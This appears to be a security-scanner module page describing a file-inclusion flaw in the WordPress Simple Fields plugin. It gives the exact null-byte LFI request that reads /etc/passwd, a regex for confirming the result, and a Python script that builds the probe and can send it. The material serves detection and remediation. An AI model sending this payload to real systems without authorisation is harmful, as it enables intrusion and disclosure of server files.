Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE

By kannthu

High
Vidoc Module
#wp-plugin #lfi #packetstorm #wordpress
Description

What is the "WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE" module?

The "WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE" module detects a file inclusion vulnerability in the WordPress Simple Fields plugin, versions 0.2 to 0.3.5. The same flaw, an attacker-controlled path passed to a PHP include, can be used for local file inclusion (LFI), remote file inclusion (RFI) and, through either of those, remote code execution (RCE); the module confirms it by demonstrating the LFI case.

This module has a high severity level: a confirmed finding can lead to disclosure of server files, execution of attacker-supplied PHP, and complete compromise of the affected WordPress installation.

Impact

If the "WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE" module reports a finding, the target's Simple Fields plugin includes a file from a path taken directly from the request. An attacker can use this to read sensitive files from the server (configuration files, credentials, source), to include a file they uploaded or control, or, where PHP allows remote includes, to pull a malicious PHP file from a server they operate and execute it. The outcome ranges from information disclosure and defacement to full control of the WordPress site and the account the web server runs as.

How does the module work?

The "WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE" module works by sending a single HTTP request to the targeted WordPress installation, aimed at the plugin's entry script, with the vulnerable parameter set to a harmless but recognisable local file. The probe demonstrates the inclusion without executing any attacker code.

The HTTP request used by this module is:

GET /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00

This request asks the plugin to include "/etc/passwd", a standard LFI canary, by supplying it in the "wp_abspath" parameter. The trailing %00 is a null-byte truncation: on PHP versions that still honour embedded null bytes in filenames (before 5.3.4), it cuts off any suffix the vulnerable include appends to the supplied path, so the include resolves to /etc/passwd itself. On a patched PHP the null byte is rejected and the probe will not match, even if the plugin code is unchanged, so a clean result on a modern PHP does not prove the parameter is safe.

The module then applies a matching condition to verify that the inclusion succeeded: it checks the response body against the regular expression root:.*:0:0:, which matches the root user's entry in /etc/passwd. A match means the server read and returned the local file.

By combining these HTTP requests and matching conditions, the module can effectively identify vulnerabilities in the WordPress Simple Fields plugin and provide actionable information for remediation.
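The request-and-match logic described above, written out as a small stand-alone checker. This is an added example, not the Vidoc module's own implementation: it builds the same probe URL, applies the same `root:.*:0:0:` matcher to a response body, and can optionally send the probe with the standard library. The two sample response bodies are constructed for the example, and the `example.test` host is a placeholder.

```python
import re
import urllib.parse
import urllib.request

# Probe taken from the module page: path, parameter and canary file.
PROBE_PATH = "/wp-content/plugins/simple-fields/simple_fields.php"
PROBE_PARAM = "wp_abspath"
PROBE_VALUE = "/etc/passwd\x00"  # embedded null byte, encoded as %00 on the wire

# Matcher taken from the module page: the root entry of /etc/passwd.
PASSWD_RE = re.compile(r"root:.*:0:0:")


def build_probe_url(base_url: str) -> str:
    """Return the full probe URL for a site base such as http://example.test."""
    # quote() with '/' kept safe reproduces the page's request exactly:
    # the slashes stay literal and the null byte becomes %00.
    encoded = urllib.parse.quote(PROBE_VALUE, safe="/")
    return f"{base_url.rstrip('/')}{PROBE_PATH}?{PROBE_PARAM}={encoded}"


def matches_passwd(body: str) -> bool:
    """Apply the module's matching condition to a response body."""
    return PASSWD_RE.search(body) is not None


def classify(body: str) -> str:
    """Map a response body to the module's outcome: report or no match."""
    return "Report vulnerability" if matches_passwd(body) else "No match"


def probe(base_url: str, timeout: float = 10.0) -> tuple[int, bool]:
    """Send the probe to a live target and return (status, matched).

    Network helper for real use; the tests below do not call it.
    A 4xx/5xx status is still inspected, because a PHP include that
    succeeds often appears alongside warnings rather than a clean 200.
    """
    req = urllib.request.Request(build_probe_url(base_url),
                                 headers={"User-Agent": "simple-fields-lfi-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, matches_passwd(resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return err.code, matches_passwd(err.read().decode("utf-8", "replace"))


# Constructed sample bodies (not captured from any real host).
SAMPLE_VULNERABLE = (
    "<br />\n<b>Warning</b>: include(): Failed opening '/var/www/wp-load.php'\n"
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
)
SAMPLE_CLEAN = (
    "<br />\n<b>Warning</b>: include(/etc/passwd): failed to open stream: "
    "No such file or directory\n"
)

if __name__ == "__main__":
    print(build_probe_url("http://example.test"))
    for name, body in (("vulnerable", SAMPLE_VULNERABLE), ("clean", SAMPLE_CLEAN)):
        print(f"{name}: {classify(body)}")
```

The matcher is deliberately narrow: it looks for the uid 0 / gid 0 entry rather than the string "root" alone, so a page that merely mentions "root" (a theme, a help article) does not trigger a report. Run `probe()` only against hosts you are authorised to test.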

For more information about this vulnerability, you can refer to the Packet Storm Security reference.

Module preview

Concurrent Requests (1)

1. HTTP Request template
   GET /wp-content/plugins/...

   Matching conditions
   regex: root:.*:0:0:

Passive global matcher
No matching conditions.

On match action
Report vulnerability